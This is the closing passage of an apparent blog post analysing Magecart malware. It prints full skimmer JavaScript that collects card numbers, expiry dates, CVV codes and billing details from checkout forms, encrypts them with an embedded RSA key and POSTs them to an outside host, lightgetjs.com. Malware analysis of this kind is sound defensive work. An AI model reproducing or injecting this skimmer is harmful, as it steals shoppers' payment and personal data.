      <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>_0x34f9e9<span class="token punctuation">[</span><span class="token string">"vm_expiration"</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        _0x34f9e9<span class="token punctuation">[</span><span class="token string">"vm_expiration"</span><span class="token punctuation">]</span> <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token string">"getElementById"</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x553440 <span class="token operator">+</span> <span class="token string">"_cc_exp_month"</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token string">"value"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
      <span class="token punctuation">}</span>
    <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x90cd50<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
    <span class="token keyword">try</span> <span class="token punctuation">{</span>
      <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>_0x34f9e9<span class="token punctuation">[</span><span class="token string">"vm_expiration_yr"</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        _0x34f9e9<span class="token punctuation">[</span><span class="token string">"vm_expiration_yr"</span><span class="token punctuation">]</span> <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token string">"getElementById"</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x553440 <span class="token operator">+</span> <span class="token string">"_cc_exp_year"</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token string">"value"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
      <span class="token punctuation">}</span>
    <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x188c28<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
    <span class="token keyword">try</span> <span class="token punctuation">{</span>
      <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>_0x34f9e9<span class="token punctuation">[</span><span class="token string">"vm_cc_cid"</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        _0x34f9e9<span class="token punctuation">[</span><span class="token string">"vm_cc_cid"</span><span class="token punctuation">]</span> <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token string">"getElementById"</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x553440 <span class="token operator">+</span> <span class="token string">"_cc_cvv"</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token string">"value"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
      <span class="token punctuation">}</span>
    <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x32a59b<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
    <span class="token keyword">var</span> _0x1e9e38 <span class="token operator">=</span> <span class="token number">0x0</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span>_0x34f9e9<span class="token punctuation">[</span><span class="token string">"vm_cc_number"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"length"</span><span class="token punctuation">]</span> <span class="token operator">==</span> <span class="token number">0xf</span> <span class="token operator">&&</span> _0x34f9e9<span class="token punctuation">[</span><span class="token string">"vm_cc_cid"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"length"</span><span class="token punctuation">]</span> <span class="token operator">></span> <span class="token number">0x3</span><span class="token punctuation">)</span> _0x1e9e38 <span class="token operator">=</span> <span class="token number">0x1</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span>_0x34f9e9<span class="token punctuation">[</span><span class="token string">"vm_cc_number"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"length"</span><span class="token punctuation">]</span> <span class="token operator">></span> <span class="token number">0xf</span> <span class="token operator">&&</span> _0x34f9e9<span class="token punctuation">[</span><span class="token string">"vm_cc_cid"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"length"</span><span class="token punctuation">]</span> <span class="token operator">>=</span> <span class="token number">0x3</span><span class="token punctuation">)</span> _0x1e9e38 <span class="token operator">=</span> <span class="token number">0x1</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>_0x1e9e38<span class="token punctuation">)</span> <span class="token keyword">return</span><span class="token punctuation">;</span>
    <span class="token keyword">var</span> _0xe078a8 <span class="token operator">=</span> <span class="token punctuation">[</span>
      <span class="token string">"firstname"</span><span class="token punctuation">,</span>
      <span class="token string">"lastname"</span><span class="token punctuation">,</span>
      <span class="token string">"email"</span><span class="token punctuation">,</span>
      <span class="token string">"street1"</span><span class="token punctuation">,</span>
      <span class="token string">"street2"</span><span class="token punctuation">,</span>
      <span class="token string">"city"</span><span class="token punctuation">,</span>
      <span class="token string">"region_id"</span><span class="token punctuation">,</span>
      <span class="token string">"country_id"</span><span class="token punctuation">,</span>
      <span class="token string">"postcode"</span><span class="token punctuation">,</span>
      <span class="token string">"telephone"</span><span class="token punctuation">,</span>
    <span class="token punctuation">]</span><span class="token punctuation">;</span>
    _0x570cfd <span class="token operator">=</span> _0xe078a8<span class="token punctuation">[</span><span class="token string">"length"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token keyword">var</span> _0x1e5f96 <span class="token operator">=</span> <span class="token number">0x0</span><span class="token punctuation">;</span> _0x1e5f96 <span class="token operator"><</span> _0x570cfd<span class="token punctuation">;</span> _0x1e5f96<span class="token operator">++</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
      _0x553440 <span class="token operator">=</span> _0xe078a8<span class="token punctuation">[</span>_0x1e5f96<span class="token punctuation">]</span><span class="token punctuation">;</span>
      k <span class="token operator">=</span> <span class="token string">"billing:"</span> <span class="token operator">+</span> _0x553440<span class="token punctuation">;</span>
      <span class="token keyword">try</span> <span class="token punctuation">{</span>
        _0x34f9e9<span class="token punctuation">[</span>_0x553440<span class="token punctuation">]</span> <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token string">"getElementById"</span><span class="token punctuation">]</span><span class="token punctuation">(</span>k<span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token string">"value"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
      <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x12e01e<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
    <span class="token punctuation">}</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>_0x34f9e9<span class="token punctuation">[</span><span class="token string">"postcode"</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token keyword">return</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span>_0x1e9e38<span class="token punctuation">)</span> <span class="token punctuation">{</span>
      _0x34f9e9 <span class="token operator">=</span> <span class="token constant">JSON</span><span class="token punctuation">[</span><span class="token string">"stringify"</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x34f9e9<span class="token punctuation">)</span><span class="token punctuation">;</span>
      <span class="token keyword">if</span> <span class="token punctuation">(</span>_0x34f9e9<span class="token punctuation">[</span><span class="token string">"length"</span><span class="token punctuation">]</span> <span class="token operator">==</span> vvk<span class="token punctuation">[</span><span class="token string">"length"</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token keyword">return</span><span class="token punctuation">;</span>
      vvk <span class="token operator">=</span> _0x34f9e9<span class="token punctuation">;</span>
      <span class="token keyword">var</span> _0x4c73bd <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">XMLHttpRequest</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
      url <span class="token operator">=</span> <span class="token string">"ht"</span> <span class="token operator">+</span> <span class="token string">"tps://lightgetjs.com"</span><span class="token punctuation">;</span>
      _0x4c73bd<span class="token punctuation">[</span><span class="token string">"open"</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token string">"POST"</span><span class="token punctuation">,</span> url <span class="token operator">+</span> <span class="token string">""</span><span class="token punctuation">,</span> <span class="token operator">!</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
      _0x4c73bd<span class="token punctuation">[</span><span class="token string">"setRequestHeader"</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token string">"Content-Type"</span><span class="token punctuation">,</span> <span class="token string">"application/x-www-form-urlencoded"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
      <span class="token keyword">var</span> _0xd96713 <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">JSEncrypt</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
      _0xd96713<span class="token punctuation">[</span><span class="token string">"setPublicKey"</span><span class="token punctuation">]</span><span class="token punctuation">(</span>
        <span class="token string">"MIIEIjANBgkqhkiG9w0BAQEFAAOCBA8AMIIECgKCBAEAw56hcvuGnPdvZ3HFAkK7T2Ga0y2ZKhdv2aToRSPsmkEEP2GdlcQkM68kEWxybYpCXn9yx98RqLSMa+CR6/RFJhVLQSKty+6mzSb2MDRb+TVK75jB7QyhfzMWZpV2JPstar0lqFLpGz0tRHKYScXtVvg5eTY8mr6tuyY+EGLL5HWwS1jJpmhsD7Dqdd5M91lIQzemMNg5jvFKMrSeSSRBQYGYRD1VzEkza+kp6QWeKVhqeU/LEtYYaE8JTeXl3WQ6PLU6feyrgvQk7C1xHfxESUlvQYzhYlnktrUANlqATrCbrLkC/J25ltOO/ciloLJWr4MaGlDVSMEKVKa3lAKzJRh5GxJJ/X0v3HsOHlUDyinYvP4xjAYtgXVhaPKnWCzSgv5vyjftG3Aifdyl9QKz4nz6JE/e9q6b8a4gB3nd6n1T9UvIi5xitxsdpO45pZmn7GWA819BNDISdsHpG/HoK/O47lYMqhDrGYXhgj1echvbKIrNtlY0ffwU7C61GYyLeKo1uihdSH/iAws6rcnbYqM3HW7tbnw2h8NfmaiUYp1wzMhgJ3Cx+TxcqwFMM0SMKj1uHulIj4184YRE1npxIwOURwqD6rMnJ4Yvj0YvfvLBbI7Y+gSwa2hLrjlBp7Ezoujv0ZJ4r9ga+vHBjdUCmriN5SektIigxGxQnIZXmLY7ULLdvkh6V87eLV/781wymXneOhKSnSzNgWENY4DLL7/tgsRuqAomoLGkJaLJ+ZjAgoa2z7qwdPW8wyb1mv/oj/xZw06wvv5VOfXoMpcq1T2Lev9xOan/GdxdDS+KJRdBFX/W8Y/Xv/p3FQAJBu/yAuZ3Dh28xWQnlMVs2Ak6VlgFA7h+Ycf0oVJKNz4X9e0LF5G6LkSYx1SVLWVj5d8VEW6qa6stA+EDDTExaMKzcjcc8RsORQstM91Gc+lF/hp76wSoJExeA23X/X7ur4jYkRZnxIYIlq2qqFEjbJ8Z7gPM+CngyzI3jgfhZj/ZyRChqm6W6tTdFZiuM0TWYLLcLMSRIUgQ5j57JAruqbgeI9vZaDu3/FC6pEv/skjP6A7Ojqw+tPbG1gvH4vbc3mgCscEQYQz3AAFMWnjFrGgASXDO6FL99vLdutlKsJWMSSdn2KThT8kyn109WGTsK2x890ANSrfCMiCgxQcuSl3PgEEFtRxt0SiT42l3RZf4PEgqqT1YdIVdc5wJn19XV6Gnl2jX4bxff27rQAgx4PUqo/uzto2y1k5N6YzULXytQx0JMqt70AUVtdg84KonrJY2f5aLU3JUMekRc4l17trUSRtjVa7aYuxtpj7+l/rG0MKV3FXa/SxMuX5Vrc8+/1RGJs/GTV7Ceapw1QAmZoAVxQIDAQAB"</span>
      <span class="token punctuation">)</span><span class="token punctuation">;</span>
      <span class="token keyword">var</span> _0x5dc551 <span class="token operator">=</span> _0xd96713<span class="token punctuation">[</span><span class="token string">"encrypt"</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x34f9e9<span class="token punctuation">)</span><span class="token punctuation">;</span>
      _0x4c73bd<span class="token punctuation">[</span><span class="token string">"send"</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token string">"k="</span> <span class="token operator">+</span> _0x5dc551<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
  <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x2661d6<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
<span class="token punctuation">}</span>

Thank you for reading, and stay tuned for the next post where I’ll be focusing on more advanced techniques to analyze Magecart malware, and malicious code in general.

Disclaimers:

  • I don’t recommend executing any unfamiliar code in your local environment without knowing what you’re doing.
  • Malware comes in all shapes and colors, and this post discusses a commonly found Magecart script structure. This is not an exhaustive analysis of all possible code injection techniques.
Spread the Word